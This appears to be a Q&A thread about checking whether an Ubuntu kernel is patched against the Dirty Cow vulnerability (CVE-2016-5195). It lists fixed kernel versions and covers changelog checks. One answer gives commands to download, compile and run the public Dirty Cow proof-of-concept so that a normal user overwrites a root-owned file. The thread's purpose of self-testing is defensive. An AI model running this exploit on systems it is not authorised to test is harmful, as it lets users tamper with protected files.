# How can I tell if my Ubuntu system has been patched so it's no longer vunerable to Dirty Cow?

Tags: ubuntu, security, software-updates

My system is Ubuntu 14.04LTS. `uname -rv` gives the following

```
4.4.0-45-generic #66~14.04.1-Ubuntu SMP Wed Oct 19 15:05:38 UTC 2016.
```

How can I tell if my system has been patched to cater for the Dirty Cow problem?

If it hasn't, how do I get it patched?

I've run Software Update and it doesn't find any more updates.

Answer (score 2):

All versions prior to the following versions are affected :

```
4.8.0-26.28 for Ubuntu 16.10
4.4.0-45.66 for Ubuntu 16.04 LTS
3.13.0-100.147 for Ubuntu 14.04 LTS
3.2.0-113.155 for Ubuntu 12.04 LTS
3.16.36-1+deb8u2 for Debian 8
3.2.82-1 for Debian 7
4.7.8-1 for Debian unstable
```

If you need to test your system you can download and compile the PoC :

```
curl https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c > dirtyc0w.c
```

As **root** create the `foo` file:

```
sudo -s
echo This is a TEST > foo
```

Check it:

```
ls -l foo
```

As **user** run:

```
 gcc -pthread dirtyc0w.c -o dirtyc0w
./dirtyc0w foo m00000000000000000
```

Check if the file `foo` is modified:

If you get this:

`cat foo` :

```
m00000000000000000
```

You are VULNERABLE.

If your file keep unchanged : `This is a TEST`  >> you are safe.

To patch your system just run:

```
sudo apt-get update && sudo apt-get dist-upgrade
```

Answer (score 1):

1. if your kernel version is > affected version

   `uname -r`
2. check the change logs, both apt and yum have change logs

   `$ apt-get changelog linux-image-4.3.0-1-amd64 | grep "..."`

for RHEL based systems i've always checked in the changelog files, but i'm sure there is a similar tool as with apt-get changelog...

Answer (score 1):

you can use aptitude. But in Ubuntu you have to install it.

```
aptitude changelog package
```

I configured my sytem so, that I become a E-Mail from System to my E-Mail-Client.

greetings bahamut

P.S it also works with `apt-get changelog package`

I forgot

Answer (score -2):

thanks for your help.
Bahamut- apt-get changelog linux-image-4.4.0-45-generic gives-
linux-lts-xenial (.66~14.04.1) trusty; urgency=low

- CVE-2016-5195

  - SAUCE: mm: remove gup_flags FOLL_WRITE games from __get_user_pages()
- srcname from mount rule corrupted under load (LP: #1634753)

  - SAUCE: apparmor: fix sleep in critical section

  -- Stefan Bader   Wed, 19 Oct 2016 11:24:20 +0200
  I think CVE-2016-5195 is the fix for Dirty Cow. Can you confirm I'm OK?